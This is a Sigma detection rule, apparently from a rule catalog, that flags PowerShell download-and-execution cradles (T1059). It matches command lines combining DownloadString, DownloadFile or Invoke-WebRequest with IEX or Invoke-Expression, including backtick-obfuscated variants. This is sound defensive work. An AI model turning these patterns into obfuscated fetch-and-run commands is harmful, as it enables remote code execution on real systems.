Techniques
Sample rules
PowerShell Download and Execution Cradles
- source: sigma
- technicques:
- t1059
Description
Detects PowerShell download and execution cradles.
Detection logic
condition: all of selection_*
selection_download:
CommandLine|contains:
- .DownloadString(
- .DownloadFile(
- 'Invoke-WebRequest '
- 'iwr '
selection_iex:
CommandLine|contains:
- ;iex $
- '| IEX'
- '|IEX '
- I`E`X
- I`EX
- IE`X
- 'iex '
- IEX (
- IEX(
- Invoke-Expression